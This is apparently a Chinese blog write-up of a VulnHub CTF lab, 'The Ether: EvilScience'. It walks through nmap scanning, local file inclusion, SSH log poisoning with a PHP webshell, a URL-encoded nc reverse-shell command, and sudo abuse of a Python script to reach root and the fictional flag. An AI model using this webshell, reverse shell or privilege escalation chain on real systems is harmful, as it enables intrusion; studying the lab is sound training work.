VulnHub-The Ether: EvilScience (v1.0.1)渗透学习

前言

靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
靶机难度:中级(CTF)
靶机发布日期:2017 年 10 月 30 日
靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。
目标:得到root权限&找到flag.txt
作者:我是小小白
时间:2021-07-08

请注意:
本博客所有文章,仅供研究测试及学习IT技术之用,严禁传播和用于非法用途,否则所产生的一切后果由观看文章、视频的人自行承担;本博客网以及发帖人不承担任何责任!

信息收集

主机发现

我们在VM中需要确定攻击目标的IP地址,可以使用netdiscover/nmap来获取目标主机的IP地址:

nmap -sP 192.168.1.0/24 -T5
参数解读:-sP : 用ping扫描判断主机是否存活,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping-T5: 指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T5

端口扫描

我们已经找到了目标计算机IP地址:192.168.1.13
第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描:

nmap -sS -sV -sC -O -T5  -Pn -p- 192.168.1.13
参数解读:-A :启用-A选项之后,Nmap将检测目标主机的下述信息服务版本识别(-sV);操作系统识别(-O);脚本扫描(-sC);Traceroute(–traceroute)-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描-sV: 指定让Nmap进行服务版本扫描-p-:进行全端口扫描-Pn:禁用主机检测(-Pn)


要进一步枚举服务,也可以使用nc连接到每个端口上。例如如下枚举 ssh和http服务的方式:nc -nv 192.168.1.13 22nc -nv 192.168.1.13 80



目录枚举

gobuster dir -u http://192.168.1.13/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 --random-agent

指纹识别


漏洞发现

Nikto 扫描

nikto :开源的WEB扫描评估软件,可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等nikto -h 192.168.1.13

本地文件包含漏洞利用

发现该网站存在这么一个url,疑似存在LFI(本地文件包含)漏洞;

http://192.168.1.13/index.php?file=

尝试了一下常用的路径发现可以读取到ssh登录日志,具体路径为:

http://192.168.1.13/index.php?file=/var/log/auth.log


这里使用burpsuite中的intruder进行尝试,进行本地文件包含fuzz测试;发现有结果中有几条返回的数据包跟其他的不同,尝试访问;

/var/log/lastlog 能访问,但是没有什么有用的数据


/var/run/utmp 能访问,但是也没有发现有用的数据


查看/var/log/auth.log时发现重定向返回到了首页,说明应该隐藏了什么东西,把请求数据包发送到repeater重放,发现返回了SSH登录日志;


注:以下操作之前最好是先保存快照,如果长时间没有成功注入并执行任意命令,可以通过恢复快照重新操作。

SSH日志Getshell

auth.log文件是我们尝试连接服务器时生成日志。那么就可以利用这个功能,发送恶意PHP代码将恶意代码作为新日志自动添加到auth.log文件中。先看一下phpinfo是否能成功利用

ssh '<?php phpinfo();?>'@192.168.1.13



既然ssh的操作可以被记录到日志中,那么可以尝试是否能够通过日志注入+文件包含来执行任意命令尝试注入一段php代码:

1、先写入php一句话木马:ssh '<?php system($_GET[cmd]);?>'@192.168.1.13(不能用双引号,并且?php中间不能有空格)2、执行webshellcurl -is 'http://192.168.1.13/index.php?file=/var/log/auth.log&cmd=ls'



既然可以执行任意命令,我们尝试一下反弹一个持久化的shell,NC不能使用-e选项时使用以下反弹语句:curl -is 'http://192.168.1.13/index.php?file=/var/log/auth.log&cmd=mknod+backpipe+p+%26%26+nc+192.168.1.7+4444+0%3Cbackpipe+%7C+%2Fbin%2Fbash+1%3Ebackpipe'
注意:这里需要进行下url编码,不然会报错;



使用python返回交互式shell:python -c 'import pty; pty.spawn("/bin/sh")'

提权

查看当前内核,操作系统,设备信息;

版本是ubuntu 16.0.4的,但是内核版本比较高,没有发现可利用的漏洞;



使用sudo -l查看一下权限,发现py文件可以以root权限免密执行


查看是否存在可提权SUID


1、使用sudo权限不需要密码执行xxxlogauditorxxx.py,查看py文件的内容发现里边有很大一部分内容使用了base64编码;将xxxlogauditorxxx.py拷贝网网站目录下,使用wget下载查看py文件的内容;


2、cp xxxlogauditorxxx.py /var/www/html/theEther.com/public_html/xxxlogauditorxxx.py3、wget http://192.168.1.13/?file=xxxlogauditorxxx.py


尝试运行该脚本,运行情况如下图:

在这个python脚本中,我们可以执行命令,当我们运行/var/log/auth.log | id命令的时候,我们以root身份来执行;

可以把flag.png文件拷贝到网站根目录下:

/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png


下载文件到本地:wget http://192.168.1.13/?file=flag.png



打开图片发现有很多乱码和一部分使用base64编码的内容;

base64解码后:flag: october 1, 2017.
We have or first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!October 3, 2017.
The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.October 3, 2017.
Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.October 4, 2017.
Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.October 7, 2017.
The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.October 8, 2017.
Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.October 10, 2017.
Isolated and exposed subject are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.October 11, 2017.
Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.October 13, 2017.
We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous death due to the subjects displaying extreme reactions the the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial laws in the event of an outbreak to the general population.--Document scheduled to be shredded on October 15th after PSA.

成功获取到了Flag;

VulnHub-The Ether: EvilScience (v1.0.1)渗透学习相关推荐

  1. VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE

    VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...

  2. Mission-Pumpkin v1.0: PumpkinGarden(南瓜花园)靶机的渗透测试

    描述 Mission-Pumpkin v1.0是初学者级别的CTF系列.该CTF系列适用于对黑客工具和技术具有基本知识,但又难以应用已知工具的人们.南瓜花园是Mission-Pumpkin v1.0下 ...

  3. 小博的软件测试学习笔记(V1.0)

    小博,一位非常热心的软件测试领域的博主,乐于分享知识和学习资料,在我的学习交流群里的小伙伴都知道,我经常给大家分享各种资料,说百宝箱也不过分.接下来看一下都发表过哪些文章: 功能测试相关 0基础入门软 ...

  4. 物联网平台TZ-IOT发布透传云内测服务:V1.0

    物联网平台TZ-IOT发布透传云内测服务:V1.0 本文博客链接:http://blog.csdn.net/jdh99,作者:jdh,转载请注明. 物联网简介: 什么是物联网?顾名思义,物联网是万物互 ...

  5. AK4安全工具集装箱V1.0.1正式发布

    AK4团队首款自研工具"AK4安全工具集装箱v1.0.1"正式发布 开发者:Bains 辅助开发者:浪飒.alsly 请不要将本工具用于非法用途,仅限自行测试. 前言 大学的时候就 ...

  6. AI+Science系列(二):国内首个基于AI框架的CFD工具组件!赛桨v1.0 Beta API介绍以及典型案例分享!

    AI for Science被广泛认为是下一代科研范式,可以有效处理多维度.多模态.多场景下的模拟和真实数据,解决复杂推演计算问题,加速新科学问题发现[1] .百度飞桨科学计算工具组件赛桨Paddle ...

  7. java 开源sns_JEESNS V1.0发布,JAVA 开源 SNS 社交系统

    JEESNS V1.0 发布了,本次更新内容: 增加后台管理员授权与取消功能 增加私信模块 解决在微博页面,左侧微博点赞过后,左侧展示列表小手会变黑,但是右侧热门出小手依然是白色 修复后台添加栏目.文 ...

  8. Kubernetes v1.0特性解析

    kubernetes1.0刚刚发布,开源社区400多位贡献者一年的努力,多达14000多次的代码提交,最终达到了之前预计的milestone, 并意味着这个开源容器编排系统可以正式在生产环境使用,必将 ...

  9. 企业智能化升级之路:CSDN《2017-2018中国人工智能产业路线图V1.0》重磅发布

    2017年是AI之年,人工智能领域多年的努力和积累终于勃发,从政府到民间,从国家战略到坊间热点,从学术圈到资本圈,从主流领导企业到创新独角兽,一时间全社会各个角落关注AI.走向AI.布局AI,AI正在 ...

最新文章

  1. ngx.location.capture 只支持相对路径,不能用绝对路径
  2. Android 系统(18)---Handler,MessageQueue与Looper关系
  3. Random Forest
  4. ASP.NET MVC 在项目中使用面包屑导航
  5. Android Studio导入Project、Module的正确方法
  6. Selenium之利用Excel实现参数化
  7. 流媒体服务器显示连接数达到上限,监控流媒体服务器连接数
  8. 小程序组件传值解决页面数据刷新
  9. 已知基因名,如何在genbank中查询基因序列?
  10. C语言基础级——N维数组定义与使用
  11. ybt1359: 围成面积
  12. java技术--报警通知及实现方式
  13. 蓝牙运动手环app开发方案
  14. 为每天节省两小时-华芸AS4004T万兆NAS搭建测试
  15. php识别名片,名片识别接口
  16. spark 实现K-means算法
  17. 最近 Flutter 争气了! Flutter 也可以做这么炫酷的动画
  18. Zotero文献管理软件使用指南——进阶篇
  19. linux防误删工具trash-cli
  20. ZSD017出货达成率

热门文章

  1. 服务器creo怎么添加配置文件,Creo配置文件.doc
  2. 简单幂级数(递归版)
  3. 使用ESP8266/ESP32 实现智能语音控制电脑开关机
  4. 音频放大器lm386
  5. java简单弹球游戏
  6. 解决FTPC 自带ireport对象调用打印机条码显示不全,反转,空白等问题
  7. Minecraft的世界生成过程(四)地表
  8. 详解http和https的作用与区别
  9. linux上的英文字体monospace可以在windows用吗?
  10. SAP-Retail标准教材下载